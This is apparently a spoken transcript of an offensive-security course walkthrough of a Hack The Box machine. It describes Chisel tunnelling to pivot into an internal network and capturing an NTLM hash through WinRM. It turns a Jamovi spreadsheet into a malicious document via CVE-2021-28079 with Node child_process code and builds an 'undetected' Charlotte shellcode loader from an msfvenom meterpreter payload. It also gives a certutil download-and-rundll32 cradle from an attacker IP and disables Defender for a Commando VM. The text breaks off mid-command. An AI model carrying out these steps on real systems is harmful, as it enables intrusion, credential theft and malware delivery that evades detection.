Great, great, great. So Control-Shift-C to copy that to the clipboard. Now we can add it to our host file. Sudo vim etc hosts. And let's see, let's grab this and put it here. Control-Shift V. So we're basically saying when you go to this subdomain here, it should resolve to 10, 10, 11, 102. And we may need to change that to the internal IP that we saw when we were in our exploration phase, because we got this from the inside of the container, right? Which was in a different network. But let's just see. Let's flip over to burp if we can. Let's try softwareportal.windcorp.htb. Okay, file not found. Right. So I'm guessing that this IP or this domain resolves to an IP that we don't have access to. Right. So let's see something. If I go back, yeah, here's our shell. Is our shell still alive? It's not. That's okay. We'll get it back. We'll get it back. We can always get back, right? Okay, so we've got our shell back. ipconfig. All right, so we've got 172.31.48.1. Let's get into PowerShell and let's test this connection. Test net connection. We'll say computer name. Put this in, and we'll test for port 80. So test network connection is an awesome commandlet. It will, like it says, test the network connection, right? It'll test to see if this particular IP is listening on this port. It's a native PowerShell command. I didn't have to import any attack tools to do this. This is one of the reasons why attackers love PowerShell, because it exposes so much functionality and enables the attacker's arsenal with very low effort. Okay, so we see that did succeed. So we know this port is listening on port 80. Okay, so what we probably need to do is we need to forward this connection, right? Somehow forward this IP address to our Kali machine, right? To our box here. Right, this is our Kali box, the attacker machine. And I remember from the con host that we saw earlier, a couple lectures back, the victim was using reverse proxies. I think they had Chisel on the box. So I think that's what we'll do. We will set a communication stream using Chisel, and we'll use MITRE ATT&CK technique ID T1573 command and control encrypted channel, because Chisel will do just that. Chisel GitHub. So you see, it is a fast TCP/UDP tunnel over HTTP. And I believe the entire thing is encrypted. Yeah, it's secured via SSH, so it is encrypted. All right, guys, so in the next lecture, we will get into setting up our reverse proxy and port tunneling. It's going to be a lot of fun. If you haven't done port tunneling before, or if you think you know what you're talking about or doing with it, you will certainly know how to use it after the next lecture. I'll see you guys in a little bit. Peace. All right, so we've confirmed we have a network we need to pivot into, and we can use Chisel for that task. And this is going to be MITRE ATT&CK technique ID T1572 command and control protocol tunneling. So let's pivot on over to Chisel. So we jumped in here in the last lecture. And if we scroll down a little bit, you can see there's a lot of information, and it can get a little bit confusing, but it says the easiest way is just to download and install with curl. So we can grab the binary, and this will go on our attacker machine. All right, so let's give it a whirl. And the move failed. Permission denied, because we need sudo, right? Sudo bash. Now we have Chisel. Great. So we have it on the attacker machine. In other words, we have the server, but we need to get the Windows client. So we will go back here and look for a Windows client. Let's see. We probably just need to download the latest release. Let's just do that. So I'm going to click on releases and see if I can find it for Windows. Windows AMD 64, that looks like it right there, 64-bit version. Right click, copy link address, sudo wget, Control-Shift-V to download. Great. Now we've got it. Let's unzip it. There it is. You can see it is in fact a portable executable. It is a Microsoft Windows binary. So let's rename it to look like a Windows binary. All right, so there we go. That is our executable. If I did cat chisel xxd head, you can see it starts with the MZ header. This is in fact an executable. So let's pivot over to our victim machine and let's get into PowerShell and let's pull down chisel. So we can say invoke web request. The URI will be our IP 10.10.16.2. I got it from up here. Chisel.exe, and we will write it out to Windows temp chisel.exe, and we will use basic parsing. Let's go into the Windows temp directory. And we can see, in fact, chisel is here. Very cool. All right, so let's jump back over to Kali and let's look at what we can do with chisel. All right, so we can say we've got a server and we've got a client. Well, we are the attacker, so we will be the server. So let's look at the help for the server mode for chisel. All right, so we've got a bunch of options here, but it shouldn't deter us in any way. We're going to make this work. We'll say sudo chisel, and then we will say server, right? Now we've got a few options. What options do we want? Well, we need a port. This defines the HTTP listening port. Okay, so we need to listen on a particular port, and we will listen on port 1037, attribute to the word leet to show that's what you and I are, right? All right, guys. So we're going to then go down, and we want to make sure that it's reverse because we want to allow the client, that is the victim, to specify the reverse port forwarding to us. Okay. So we'll say reverse. We're also going to want to allow the client to access the internal SOCKS 5 proxy. So we'll say tac SOCKS 5. Good. So we are listening and we're ready to go. Let's flip back over to the client. And the way we're going to do that first is look at sudo chisel client help. So you can see what we can do for the client. So we're going to say for the client, chisel client, then we will put in the server and then the remote, right? So the server is going to be 10.10.16.2 on port 1337, and the remote will be 127.0.0.1. And we're going to put the protocol, which will be SOCKS. All right, so I'll show you what I mean in a second. Let's exit this, flip back over to PowerShell, and we'll run this with start process. We'll say the file path will be our chisel executable. And for the arguments, we will put in 10, 10, 16, 2 on port 1337, and we will then specify the local host on SOCKS, which is the protocol. And it's not arguments, it's argument list. So let's go ahead and copy this, Control-Shift-C. Well, I'm killing the shell. Hard, I'm really killing the shell. Argument list. There we go. All right, so let's flip back over to Chisel. And you'll see now it actually says we're listening on port 1080, which is for SOCKS. So session 1, right here, session 1, on our TON adapter, that is our VPN adapter, we are listening locally on port 1080, we meaning the attacker. So we can use this tunnel by editing a file called proxychange.conf. And we can do it so that we can listen on port 1080, the same port that Chisel's listening on. And then we can redirect the traffic from the victim to us, the attacker. All right, it may sound kind of confusing, but it is all going to come together in a moment. All right, so proxychains.conf, let's open that up. G to go to the bottom. And we want to set this to SOCKS 5, 127.0.0.1, port 1080. And instead we will comment out SOCKS 4. Escape, Shift-Z. And then what we're going to do is edit our host file so that software portal actually points to the victim IP, which is 127.31.48.1. Control-Shift-V. All right, that looks good. Now we can use proxy chains to try to access that portal, right? Because remember before when we went to softwareportal.wincorp.htb, we got nothing, right? It said the file was not found. But now we're tunneling that traffic via Chisel through our reverse proxy. And so we should have access to it. We can use proxy chains as our medium to interact with that tunnel. So if we say sudo proxy chains, curl, let's just run it silently. And we use the get header for get request. And we will just make that request to softwareportal.windcorp.htb. Let's see what we get here. All right, so now we're getting some data and it doesn't look like it's a 404. Right, it looks like we actually have some kind of, intelligent response. It says WinCorp software portal. So we are effectively using this proxy chain to basically connect to our local host on port 80 and send that through to 172.31.48.1, which is the victim machine over port 80. And Chisel is allowing us to do that. Now, if we want to read this a little easier without actually opening the browser, we could use HTML to text. So if we run sudo apt info HTML to text, you'll see this actually will read the HTML from the documents supplied in the command line, and then it just converts it into basically a stream of plain text characters. So it's kind of like a text-only browser. It reminds me of Lynx. If you've ever used Lynx, it's a text browser, really, really old school. But this is one way that you can quickly survey a web application without having to visit the page. So let's just go ahead and install this real quick. Sudo apt install HTML to text. And we'll rerun our curl through proxy chains and pipe it to HTML to text. Now you can see it actually will just show you the HTML on the page, right? So we have these different categories, these different projects, and it looks like we have different applications that we can download, like 7-zip, GIMP, Jamovi, and VLC. So this is a software portal, as it says, right? Place where we can download applications. So I think our next step should be to view this web application. We're going to do it in Firefox with Foxy Proxy. If you try to use the Burp browser, it's going to burp on you because Burp is auto proxying all traffic through Burp, not our SOX proxy, which is listening on port 1080. So we can't actually use the Burp browser on this. Instead, we're going to use Firefox. So Foxy Proxy, let's get that set up. All right, so that was pretty quick. Let's go into Firefox, Foxy Proxy, and we will set things up. We'll go to Options, click Add. We'll name it SOX. Then for the proxy IP, we'll put in 127.0.0.1. The port will be 1080, right? That looks good. And then we can do save and edit patterns. Let's just name it Anubis. For the pattern, we can put star software portal.windcorp.htb star. That looks good. And that way we're filtering anything that has softwareportal.windcorp.htb. Right? Because there's going to be some assets on this page that point to Google and some other internet accessible resources. And if we don't set this pattern up correctly, you know, it's going to try to go out to the internet and get those resources, but it can't. So the page won't render correctly. So we'll click save. You'll see what I mean in a second. So I just want to go back to edit just to make sure everything looks good in here. Okay, it does look good. Let's go back and let's see if the page loads. Software portal.windcorp.htb. Let's go ahead and select, of course, our SOX. Connection was reset. Use enabled proxies by patterns and order. Let's see, something was not right here. Proxy type, yeah, it should not be HTTP, it should be SOX 5. All right, let's try save it now. There we go. Sweet. So now we have everything being proxied through Chisel, through our tunnel. And you can see the visual representation of what we saw through HTML to text. So we can press Control U, take a look at this web application. You can see these resources right here. See, it was trying to go out to Google APIs, Cloudflare. That's why we need to set that pattern match so that it doesn't try to go out and pull these resources from the internet. Because otherwise they wouldn't show up and the page wouldn't render correctly. So you can see a couple of links here with an IP address hard-coded into this particular link. So I think we'll explore this in the next lecture when we actually get into credential access. Okay guys, so you got your Chisel reverse tunnel working. Everything is right with the world. And in the next lecture, we will get into credential access. I'll see you guys in a little bit. Peace. Oh, right. So we are now proxying, that is sending the remote server IP to us, the attacker, through Chisel and SOX proxying. And you can see the web application that is visible to us. It looks like some kind of a software portal. Let's see. The fact that you are not local administrator anymore will not be a hinder for you getting the software you need installed. Okay. All right, so get started. Let's see, what do they have here? Our software, 7-zip. Got some applications here. And in the last lecture, you may remember we did see, you can see it here too, when we mouse over the link, we have an IP address that is local, right? 172.23.98.190. That is an IP that is hard-coded into this client equals get parameter. We might be able to play with that a little bit. Let's see what happens if we try to install 7-zip. So I just clicked it. All right, starting installation. And it looks like it's trying to load something. I can press Control U. See if I can get the source code here. Just a bunch of CSS, HTML, Bootstrap. Nothing too interesting there. Sometimes I like to look for, credentials, passcodes. I'll type like the bracket and then the bang, tac to look at all the comments. Sometimes developers will put in private IP addresses, API keys, and other things that they don't think users will see. Control W to close that tab. And it looks like it just took us back here. So it was trying to install something, but it probably doesn't know where to install, right? So I'm going to right click on this and say copy link. And what I want to do is I actually want to modify this link. Let's play with it a little bit. Control AZ. So let's say sudo proxy chains, curl, silent, we'll run the get request, ignoring any digital certificates. And in here, I'll just put in this link to install 7-zip. Right, it just says starting installation. Okay. Now, what would happen if we changed this client IP to our IP, right? To 10.10.16.2. Could we then capture something that was intended for this application? Could we then intercept some communication stream? Or I guess you could say like a man-in-the-middle attack if we change this IP to our IP. Maybe it will allow us to see something that we shouldn't have access to. I don't know, it's just a thought, right? So I'm going to swap this out. 10.10.16.2. All right, so it looks the same. What I think we should do here is fire up a packet capture and capture some of these packets while we do this. So I'll say sudo TCP dump. I'll listen on the ton0 interface, that is our hack the box interface. And I'll write the output to a packet capture called anibus.pcap. Don't resolve any names and be verbose. So I'm just going to capture all these packets. And you can see right now I've gotten 0 packets. Let's go ahead and try to send this GET request again. You see we got a few packets. All right, let's capture maybe 100. Let's wait till we get to 100, if we can. I want to see if we can get a callback from that server. If we can get that server to contact us somehow by putting our IP, we might be able to intercept something that the server is sending to the client, right? Because in order to install application software, maybe you need to include a credential in that request. And if we can capture that credential, then that'll give us a pivot point. All right, so we got 93 packets. I think on 95, that's pretty good. So I'm going to press Control C to close out of TCP dump. Make sure we have our file. We do. Anibus.pcap. All right, very good. So now what I'll do, Control AZ, we can run tshark. This is kind of like the command line version of Wireshark. And what we'll do here is we will just read in. So the TAC-R will allow us to read in a pcap. And let's see. TAC-R, yep. In file, yeah, so read file. So tac read file, or we could do TAC-R. I'll just do tac read file to make it explicit so it's clear what I'm doing. And I'll read in anibus.pcap. Let's take a look at it. All right, so we have a problem here. Do we need to run sudo? No. Read file. So that didn't seem to work. Let's just do the TAC-R. Oh, right, there we go. So we've got all of the packets here, and let's just grep for Let's just do less and see if we notice anything interesting here. So we see port 1337, that is our tunnel, of course. We also see port 5985, which I think is WinRM, I think. Is that right? Somebody fact check me on that. Port 5985. Yeah, the Microsoft Windows Remote Management port. So that's sometimes used for PowerShell remoting. When you'll try to remotely manage a machine, you'll authenticate and then manage it. So if the server is trying to connect to us on port 5985, sending a synchronization packet, and then we send a reset ACK because we're not listening, we are not listening on port 5985, then what if we were listening on 5985? Then maybe the server would try to send us something over WinRM, like authentication material, right? So let's see if we can do that. Because sometimes you can capture NTLM hashes this way. Hold on, let me just close out of this. Q. And I'll say tcp.port 5985. Yeah, I'm seeing all these reset ACKs. So let's just listen on 5985. Okay. Let's resend the GET request with our IP as the client. See what we can capture. Ah, look at that. We see the server tried to make a post request to us, to this endpoint. And we definitely see it's a Microsoft WinRM client. Tried to connect to us in 5985, but it sent this string right here. It looks like it's base 64 encoded. Let's quit. Control C. Let's echo this. Okay, and then let's try to base 64 decode it. NTLM. Guys, we now have a opportunity to capture an NTLM hash. Because you can see this is an NTLM request that is being sent from the server to us via WinRM. That's probably how this software portal is installing software on connecting clients. So what we can do in the next lecture is capture and crack the hash. So I'll see you guys in the next lecture, all right? Peace. Resource development, and it starts with commando VM. You can pop open Google and just type in commando VM, and you should see a GitHub page that is owned by Mandiant. All right, so now we're going to grab this. You can see basically what it is a security distribution made for pen testing and red teaming. This is perfect for testing the CVEs we discovered that are applicable to the vulnerable Jamovi application. So the setup requires a couple of steps, right? So first, we need to make sure that we've got 60 gigabytes of hard drive space and a 2 gigabyte of RAM. What we're going to do is we're just going to set all these specs up in a virtual machine. It's a lot easier to set it up that way. And then we will go through the process of doing the pre-install procedures and everything else here. Okay, so there are a couple of steps, but once you have it set up, you will have an awesome Windows distribution that you can use for many things that will stretch far beyond the boundaries of this course. Okay, so the first thing we're going to do is acquire our server, right? We're going to go to Google and we will type in TechNet Windows 10 Enterprise because we need to grab the Windows 10 Enterprise virtual machine. And the commando VM is really just a collection of PowerShell scripts that pulls down a bunch of data and transforms your benign VM into an offensive workhorse. All right, so I'm going to click Continue. All right, we'll get the 64-bit English download. All right, so this file is about 5 gigs. We will let this roll and we will come back when it's done. It's to download 5 gigabytes. Now what I'm going to do is make sure we have everything configured correctly. So we have the ISO. We'll pop over to VMware Workstation and we will set this up. We can go to File, New Virtual Machine, and we will say typical. So we'll say I will install the operating system later. And we'll just set Windows 10 and later x64. All right, so we'll name it Commando VM. And make sure you put it in a location where you have ample space. Ideally, we want 80 gigabytes of hard drive space, 4 gigabytes of RAM, and 2 network interface cards. You don't need that specifically, but if you have it, it will help immensely. So I'm going to bump this up to 80. I'm also going to store the virtual disks as a single file to improve performance. And let's click Next, Customize Hardware. Let's make sure everything's good here. So we'll set the RAM to 4 gigabytes. Processors look good. Network adapters, let's see. Let's add another one. So you can't see me clicking Add, but I'm going down to the bottom and I'm clicking the Add button. I can't actually drag the screen up high enough to show you that I'm clicking Add. But anyway, I'm clicking an Add button at the bottom of the screen, and I'm just going to click Network Adapter, Finish. Now we've got 2 of them. I'm going to set them both to bridged, at least to start. And actually, you know what? Let's set one to host only. There we go. That looks good. All right, I'll just press Enter, check my settings, 80 gigabyte hard drive, 4 gigabytes of RAM. We got our network adapters, bridged and host only. Let's finish. All right, so now we're going to click on the CD. And then here we'll use the ISO image that points to our Windows 10 virtual DVD. So I'll click OK. And then we'll fire it up. And let's get this installation going. I'll click into the window and press Enter to kick it off. So this is actually MITRE ATT&CK Technique ID T1583.004 Resource Development. Acquire Infrastructure Server. All right, so let's set this up. We'll click Next. Install now. Okay, so I'll click Accept the license terms. We'll click Next. We'll click Custom. That is the same as a clean install. We're going to click the unallocated space 80 gigabytes inside of our virtual machine. And we'll click Next and wait for things to finish. Okay, it took about 10 minutes to get to this point. So now I'm going to select my region and let's get all these settings in place. All right, set up the keyboard. Don't have a second keyboard, skip that. All right, so we're not going to use a Microsoft account, so I'll click Domain Join instead. And I'll just put in my name here. Enter. And we'll put in a password. All right, security questions. Gotta love them, right? Okay, privacy settings, I'm gonna disable everything. Don't wanna send any diagnostic, telemetry, or anything like that to Microsoft. And then I think it's going to ask about the digital assistant Cortana. Yep, so I'll say not now. That was the last major step. Yeah, I think it's gonna try to sign us in now. Okay, so we'll wait for this to log us in. And then the next step, let me escape from this VM here, will be to, let's see, we've already done the requirements. We've actually done the recommended requirements. So we will need to disable Windows Defender through group policy. And we can also disable tamper protection. That has to be disabled, otherwise group policy settings will be ignored. Okay, so basically just going to follow these instructions, right? We're going to type Windows Security. We're going to go to Virus and Threat Protection, Virus and Threat Protection Settings, Manage Settings, turn off Tamper Protection. Don't need to worry about real-time protection. And then after we do that, we will permanently disable real-time protection using group policy, going to this path here and disabling real-time protection, and then we'll reboot. Okay. So we'll come back once this finishes and we're able to sign in. Okay, so we're finally here. It took about 3 to 5 minutes to get here, so I will close this and let's follow the instructions. So we need to go to Windows Security. Windows Security. Virus and Threat Protection. Manage Settings. Tamper Protection. Off. All right, so now that that's disabled, we can run gpedit, so the group policy editor. So I'll type gpedit.msc, pop it open, and then we can disable Windows Defender this way via the group policy objects. All right, so what was this place? I think it wanted me to go to computer configuration. Yes, administrative settings, Windows components, Microsoft Defender antivirus. Let's make this big. Turn off Microsoft Defender antivirus. Right, so right now this is not configured, so we turn it to enabled. If you enable this policy setting, Microsoft Defender antivirus does not run. Good, so that basically turns it off. Click apply, okay. And then we will reboot. Right, let's log on in. gpedit.msc. Let's also turn off real-time protection. So I'll double click in here and turn this guy off. And I just want to make sure, we did this right. So I'm going to go to Windows Security. That looks good. Yes. Now we need to make sure that our virtual machine is completely updated. So let's go ahead and do that, and then we'll take a snapshot. And obviously this can take a while, so we'll just kick off this process and let it go. All right, so a couple of hours later, we are now all up to date. And let's continue to go through the installation process here. So everything is up to date. We don't have any reboots pending. We can take a snapshot of our machine. All right, let's do that. So let's see, snapshot, take a snapshot. And we'll say commando VM clean. No tools yet. All right, so we'll let the snapshot go and then we'll come back when it's done. All right, so our snapshot is done. Now the next step, I think what we should do is to clean up this interface a little bit. You notice that the window's a little bit small. We didn't even install VMware Desktop. So what we can do is minimize all this. And you can see here that VMware Desktop is not installed. So I'll do Control-Alt to escape the VM. I'll go to VM at the top of VMware Workstation, and then I'll go down to Install VMware Tools. Now I can open up Explorer, and I should be able to double-click the virtual CD-ROM. Yes, there we go. VMware Tools. This will fix our display and make everything look nice. And our mouse and keyboard, it'll work a lot more fluidly as well. All right, so we'll click Next. We will do the complete installation for VMware Tools, and then we'll click Install. All right, so we'll let this go, and then once it's done, we'll reboot and we'll proceed with the commando installation. All right, so we've got the box rebooting. Next, we need to go ahead and grab this install.ps1. So if we look on the GitHub repo, you can see there are a lot of files here. And we could just say go to file, right? And then we can type install like this, right? And we can just grab install.ps1. If we click raw, it'll get us the raw file that we can just copy and paste, or we can just grab it like this, copy, and then drop that into the VM. Control Alt Insert. Let's log in. All right, so now we're going to open up an elevated PowerShell. Run as administrator. And let's change into a folder where we want this to be installed. So we can say invoke web request. And then we can say use basic parsing. Let's see if this works. Of course, we need to specify the out file. We'll just call it install.ps1. Now we have it right there. So let's see, what else do we need to do here? Allow script execution by running the command set execution policy unrestricted. And then unblock the script, unblock and install the script by running unblock-file and then the script name. And then we can execute it. Now I think there was an ability to use a password, which I think will make this installation a little bit less attended, which means we won't need to monitor as closely. Let's see here. Yeah. And this order is a little bit different. Okay, so unblock the file by running this. So unblock file, install PS1. All right. Finally, execute the installer. And we'll pass our password as an argument. Here we go. This is the way. All right, do you need to change this setting? Please disable Windows Defender tamper protection and retry install. Well, I think we already did that. Let's just double check. Actually, we can't even see it because it's been disabled via group policy. Right. So yes, we already did that. Do we need to change this setting? No. All right, so now it's checking if Windows Defender is running. Okay, it looks like this version of Windows is really current. It says it's not been tested. I got this error last time I installed this as well, and it worked perfectly fine for me. So I'm just going to say yes to proceed. You need to take a snapshot before continuing. That is a good thought, but we've already done that. So we are good. We'll click. So we'll say no. Install notes. Yep, we already did that. This is good. It tells you how you can check what packages failed when you're going through the installation process. Please copy for your reference. That I will do. So in PowerShell, you can just select and then right click and it'll copy it to the clipboard. All right, guys, so we'll let this run. I will let it install, and it's not completely unattended, so you'll have to, check in occasionally. But the whole idea is that when this thing gets set up, this machine will be a beast. Let me show you what we're about to get. So if you scroll down here, you can see available tools. Okay, so we get, SQL Server, sysinternals, that's cool. But we also get Covenant, C2. We get WMIOps, another command and control framework, along with WMI implant. We get all these developer tools like Java, Python 3, which is default, which is pretty cool. We get Ruby, we get Visual Studio Code, yes, Docker. So we've got the Amass version, the Docker version of Amass and Spiderfoot. Amass is great for recon information, and so is Spiderfoot. We've got Evasion, Invoke Obfuscation, Invoke Cradle Crafter. This is great for PowerShell download cradles. Anti-malware scanning engine PS. This is a way of bypassing that. Powerless shell. I mean, there's so many different tools here. Crack map exec. You guys are already familiar with that. We've got evil Clippy. I mean, this just goes on and on. We've got parts of the ghost pack. In packet, juicy potato for privilege escalation. We got some Kali binaries like netcat and all those binaries. Nashang, you guys are familiar with that already. I mean, there's just a ton of tools and it just keeps going, guys. So it's going to be awesome. Remember, we're not going to use everything here, but like I said, you're going to use this on future projects, I'm sure, because there's just way too much here to keep hidden inside. Mimi Kittens is really cool if you're trying to find credentials without an elevated session. So you can pull credentials from like Firefox and different browsers and things like that. It's really cool. But anyway, I'm not going to keep going down here because the awesomeness just continues. All right. So we will let this set up. And if it gets stuck, just click into the window and press space. But we'll come back once it's done. And then we'll move on to the next phase of resource development, which is downloading that Jamovi software and change the resolution to make it a little bit easier to see. And we'll add our commando background. And then we will build out our Jamovi software and start weaponizing our Jamovi spreadsheet document based on the CVE we found earlier. All right, guys, I'll see you in a little bit. Peace. All right, so now we are going to install the Jamovi executable. All right, so let's go ahead and double click the Jamovi folder and let's install it, guys. All right, install, show details. So we've got the vulnerable version being installed. We know this is vulnerable to the cross-site scripting vulnerability. Right, so CVE 2021-28079. So let's see, we came across an injection in Jamovi that could lead to remote code execution. Let's see, we can make a OMV document containing a payload. When opened by the victim, the payload is triggered. Code is executed under the privilege of the user, okay? So we'll let this install and we will come back when it finishes. All right, so the installation finished. Let's open up our application. It took about a solid 10 to 15 minutes before it completed. We'll open up whatif.omv and just take a look at the file. Starting Jamovi. Okay, so this looks like some kind of spreadsheet document. And it says, all right, hi, we found a security issue with this version of Jamovi. And out of an abundance of caution, we recommend that you update to a newer version when you can. You can continue to use this version of Jamovi, but we'd advise you not to open data files from sources you do not trust until you update to a newer version. All right, so this is the kicker here, guys. The reason why we shouldn't open data files from sources we don't trust is because of what we're about to do next. When we go back to the CVE, you can see here, it says that there's the possibility of remote code execution. And when you scroll down, it says when a user opens a document, the code is executed on the local machine. This is cross-site scripting, right? And it says specifically the column name is vulnerable to cross-site scripting in the Electron.js framework. Now, the reason this works is because the Electron.js framework is built on Node.js, and Node.js is built on JavaScript, which then means we can execute arbitrary JavaScript commands in a vulnerable field. In other words, a field that doesn't have user input sanitization, which appears to be the column name header. Okay, so if we jump into the column name header, let's see what we can put in here. It's going to open this up. So this field is probably not being sanitized, right? So let's just try a generic cross-site scripting payload. Let's put in script. And I like to see if we can pop the document domain, because that'll show us document domain. That'll show us the domain where the vulnerability exists. Now, since this is on a local host, there's no domain like www.securitypluspro.com or anything like that. It should just show localhost or 127.0 file.0.1. So I'm going to save the file. All right, looks like it's been saved. And remember, it said the vulnerability is triggered when the document is opened. So let's reopen it and see if we get an alert for localhost. Here we go. Is it going to pop? Yes, 127.0.0.1. So here's the thing, right? This is a reflected cross-site scripting vulnerability in a desktop application, right? So it's not like we can steal somebody's cookie, but the key here is if we remember that this particular file had a recent last modified time. So there's some user interacting with this file. So if we can modify our cross-site scripting payload in such a way that when the user opens it, instead of popping 127.0.0.1, we'll get a reverse shell that'll be running in the security privilege of that logged in user. So the next question we need to ask is it possible to get local code execution through JavaScript? We need to look at ways of executing processes, like system processes using JavaScript, or really specifically Node.js, because that's what the Electron framework is based on. So let's see here. Go to Google, and let's just type process execution JavaScript. See if we can find a link for Node.js. Yes. Let's check this out. All right, so we've got this process part of the Node.js API. Let's see, there's a lot of options here. All right, but I'm seeing a child process piece of the documentation. So let's click that. And here I see there is a child_process.spawn. So probably we can put something where it says command, and that will be the process that is spawned, right? So we can put calc here and pop calc or something like that, I would imagine. Let's see, command, the command to run. It's just a string. Okay. So it looks like the way we do this is we need to use require, and then we can put in child_process. And then we need to put in the .spawn part of that function. child_process.spawn. And here you can see actually here they put in this command where they're basically using Linux to list the directory contents. Okay, so I think we can do this. I think we've got what we need to build it out. Let's modify this. So instead of alert.domain, what we can do is put, for some reason I can't type in here, but I can do other things like delete things. All right, let's just close this out. I'm not sure what's going on there. Let's try reopening it. All right, we'll click OK on the pop-up. Let's get into this column header. Make sure I click the column header. Okay. Hopefully I can type in this field now. So we'll say require. Can't type in any of these fields. Is my keyboard still working? All right, so what we'll do, don't know what the heck is going on here. I'm just going to type the payload here. So I'll say require, and we want to do a spawn, right? What do we want to spawn? calc.exe. Basically, we want this to happen when the document opens. This is what we should see. So for the require, we'll do just what the documentation says, which is to put child_process. So let's see if we can paste that into this field here. Let's just remove all that. Now it lets me type. No idea what's going on. All right, so anyway, we've got the payload there. Let's go ahead and click File and Save. All right, file is saved. So if we did this correctly, when we open it, we should see calc pop. What do you guys think is going to happen? So as we wait to watch, this is actually MITRE ATT&CK technique ID T1587.001 resource development. Develop capabilities, malware. Will it pop? Up. Pop it like it's hot. Yes. Pop, pop, pop. All right, so we got calc. In the next lecture, we are going to turn our benign POC that you can see here. We're going to turn this into a fully undetected reverse shell. That's right. We're jumping into defense evasion. Are you ready? Let's go. Peace. All right, so let's get into how we're actually going to execute this attack. Again, I keep going back here because we really need to understand how to build this payload. It says that we could get remote code execution. We see Jamovi open, and then we see netcat, and it returned a callback from the user's execution of this malicious document. I'll call it a maldoc. That's typically what they're called. But notice, before the reverse shell is returned, there's a GET request to jamovi.js. Now, we don't have jamovi.js here, right? It's not listed in this repo. That's because it's up to us, the attacker, to create it. So we need to build a JavaScript payload and host it in our Kali install. And then in Jamovi, we'll instruct the application via the malicious HTTP header to make a GET request to our Kali box, pull down a JS file, which will then deliver our malware to the victim. So there's a couple steps to do this. And one of the things I want to do, because this is an insane level box and this is an advanced course, I want to step it up a notch, and we're going to dig into defense evasion. So I don't know if you guys have heard of this project. This is Charlotte. It is a fully undetected shellcode launcher written in C++. So as you can imagine, this is pretty dangerous, right? It was fully undetected as of May 13th, 2021. Now you might say that's pretty old, Vonnie. This might not work anymore. And it probably doesn't. Back then, it had 0 out of 26 detections on VirusTotal. But if you scroll down to the bottom, the author actually tells you some things you can do to make it undetectable again. Okay, so I'll leave that to your own analysis. But first, what we're going to do is jump into MITRE ATT&CK technique ID T1204.002 execution, user execution malicious file. We're going to clone this repo and get started, okay? Now, one thing I've noticed, if you try to execute this all in one command, you'll run into issues. And so instead, I like to grab just a piece of it. And then we will install mingw later. So let's jump back into Kali. I'll rename this Charlotte. Charlotte. Sudo Control-Shift-V. Let's get Charlotte. All right, so where's Charlotte? There it is. So we can get into that folder. You'll see we now have some files here. And of particular interest, of course, is charlotte.py. But before we jump into that, we first need to make sure that we install the Linux binary for compiling PE executables. That is, files that can run on a Windows target. So we will say sudo apt install, and we're just going to install all of the mingw 64-bit tools. Now this is going to take a while. It took me, I think, 5 minutes when I ran this before, but mingw, you can see there's several of them, right? GCC mingw 64, GCC plus mingw 64 x86. Again, this is the binary that will allow us to compile a Windows executable on Linux, right? That's the key there. All right, so let's let that run. And let's flip back over to the instructions. So we cd it into Charlotte, and then here's the next thing we can do. We can run MSF Venom. This is part of the Metasploit framework. And we can pass in a payload, for example, the interpreter reverse TCP. Then we can put in our local IP, that is our ton0 interface, a local port, and then we can output the binary in raw form as a file called beacon.bin. Then, since this is in the same folder as Charlotte, that is our Charlotte exploit, we can just run Python Charlotte and it will return a run DLL 32 one-liner that will point to a function that will allow us to inject shellcode that will allow us to use that DIL binary to shovel a meterpreter shell back to us, the attacker, when the victim opens the Jamovi maldoc and triggers code execution via the reflected cross-site scripting vulnerability. And now, I know it sounds complicated, and admittedly it kind of is, but don't worry, I'm going to walk you through the process. Okay, so let's see here. Where are we? All right, this finished. Great, great. So that was only a few minutes. It took as long as I was talking. Let's get MSF Venom running. So we'll clear the screen. I'm going to flip over to the documentation, scroll down, and get a better idea of the usage. So we're in the Charlotte directory. We've already cloned the repo and installed mingw. So now we just need to run this command here, but your IP and your port are variables, so we need to define them. And we can do that by just saying your IP and then assigning it to our current IP, 10.10.16.2, and we can say your port and assign that to the port we want. And now if we echo your IP, you'll see we get the result. And the same for your port. Right? So now we can actually run this metasploit command. Just like this, we can copy it in. We should probably run it with sudo as well. So we'll let that run, and I'm going to minimize this back here. All right, so let's see, do we have it? Yes, we do, and it is a executable for Microsoft Windows. Very cool. Let's see if we pipe it to XXD and head. I'm looking for that MZ header, and there it is. All right, so we're doing good there. Next, I think we just need to run, Charlotte, Python, and then profit. All right, so let's minimize this. Let's see, what do we have in here? We've got charlotte.py. We also have the beacon file we just generated. So we can say python charlotte.py. All right, so now we've got this command here that we can execute on our Windows 64 victim. So I'm going to copy that to the clipboard. I know I'm going to need it later. And we should have our shellcode loader here. We do. All right, sweet. So now let's go ahead and start up the Metasploit framework. You can run sudo msf console. I like sudo msfdb because when you use it with the run command, it'll actually start up the database as well as the console. Whereas if you just run msf console, it just starts up the Metasploit framework by itself. It just takes a little longer to start, in my opinion, if you use msf console. All right. Oh, I love that ASCII art. Man, it looks so good. Okay, so let's say use exploit multi-handler. And now we need to set the payload, because right now it's configured for generic shell reverse TCP. That's not what we want. What we want is what we used up here. This has to be identical, otherwise you will run into issues. Let's go up here. Oh crap, it looks like it printed out the whole thing. Let's see, capital G. So this is what we want right here. We want to make sure that our payload is set. Control-Shift-C. And of course, our IP and our port needs to also match up. So I'll say set payload, set lport 4444, set lhost to 10.0. That is our hack the box IP address, the VPN address, and then we can say options, just to make sure we've got everything in place. ton 0444, and the exit function is set to process. We could have changed it to thread when we built out the payload so that when the process dies, our shell remains. But we're not going for perfection, we're going for pwn. So it's okay that things aren't perfect. All right, so we are listening on the right interface with the right port. So now let's build our malicious jQuery payload. So we can open up a new file, name it jQuery.js, and we'll start. So we know we want the require, and we'll use the exec function this time. We want to use child process. And then we will use, let's see, what can we use? I'm thinking we can use cert util. So let's go back here. Living off the land binaries. Yeah, so I want to show you guys this. You may have already seen it, but if we type cert util here, we can see that this is a Windows binary is typically used for handling certificates, but it can be abused. Threat actors have found ways to use it for nefarious purposes. And this is where you use a benign binary for bad ins, right? And that's pretty much what a lolbin or living off the land binary is. So if we click download, you can see we can actually use cert util to download data. So in this case, we can use cert util to download charlotte.dll and then save it out to a world writable folder like Windows tasks. And then we can immediately call the rundil binary on charlotte.dll and execute the random function that was generated from charlotte.py. So it's going to make a lot more sense when we actually do it. Let me just show you what I'm talking about here, because it may not compute until we type it out, right? So we can type cert util.exe URL cache, just like the living off the land binary specified. We'll put in our attacking IP 10.10.16.2, and we will put in the Charlotte DLL. We will write everything out to Windows tasks, making sure we escape the backslash because Linux doesn't like backslashes, right? They want to be escaped in the Linux shell. So we put 2 backwhacks, Windows 